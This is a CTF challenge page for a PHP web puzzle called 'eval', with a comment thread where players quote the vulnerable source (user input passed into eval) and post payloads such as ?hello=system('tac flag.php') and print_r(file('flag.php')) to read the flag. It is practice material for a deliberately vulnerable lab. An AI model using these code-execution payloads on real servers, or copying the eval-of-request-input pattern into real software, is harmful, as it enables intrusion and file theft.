evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 17447
提  示:
描  述:
eval
...
登录回复
评论
Easyoung 4年前
举报

直接在评论里发flag,年轻人不讲武德?

回复 2
sn1p3r 4年前
举报

@harry 看到管理员三个字,熠熠生辉。

回复 1
harry 管理员 4年前
举报

动态flag他们发了也没事

回复 11
xiao 4年前
举报

直接用?hello=file('flag.php'),var_dump()函数可以打印

回复 17
wyx48046 4年前
举报

厉害!

回复 0
Hiiro 4年前
举报

大佬大佬

回复 0
test_ctf 4年前
举报

牛逼!

回复 0
Hacker23 4年前
举报

http://114.67.246.176:10183/?hello=system('tac flag.php')

回复 12
ZTyyds 3年前
举报

原理是什么啊???想了解一下

回复 0
guoguo 4年前
举报

题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph

回复 3
dsadscxzewq 4年前
举报

为啥用cat不行呢?

回复 0
痕夕 4年前
举报

看不懂,求解,大佬

回复 6
SwBack 4年前
举报

大道至简,直接当作一句话利用即可 hello=system('tac flag.php')

回复 5
巨人肩膀上的矮子 4年前
举报

@dsadscxzewq cat是可以的,只不过在源代码里查看

回复 0
dsadscxzewq 4年前
举报

为啥用cat不行呢?

回复 1
BBBugku 4年前
举报

F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。

回复 14
krystalll 4年前
举报

感谢

回复 3
lurnco 4年前
举报

Too young Too simple

回复 3
Discuze奇 4年前
举报

我的金币不太允许了呀。。。

回复 1
lurnco 4年前
举报

可以创个小号做后面的题人?

回复 0
1amer 4年前
举报

直接读文件吧

回复 0
你听说过呆呆吗? 4年前
举报

只有我一个人知道bugku更新了吗

回复 0
storn 4年前
举报

我也是刚发现,而且,我原来的号好像没了,o(╥﹏╥)o

回复 0

WriteUp

image
harry

1 金币

立即查看

评分(10)

解题动态

wujiayi 攻破了该题 5小时前
187784 攻破了该题 7小时前
hahahahahahaha 攻破了该题 7小时前
codegod 攻破了该题 14小时前
Julia 攻破了该题 23小时前
kingxin 攻破了该题 23小时前
123456sefss 攻破了该题 1天前
hanzkj 攻破了该题 1天前
touchcandy 攻破了该题 1天前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
bushi 攻破了该题 1天前
orange2015 攻破了该题 1天前
刚哥glory 攻破了该题 1天前
2757547892 攻破了该题 2天前
没有伞的小白帽 攻破了该题 2天前
zcgzcx1234 攻破了该题 2天前
yjyyds 攻破了该题 2天前
walkerming 攻破了该题 3天前
f13yf 攻破了该题 3天前
问题反馈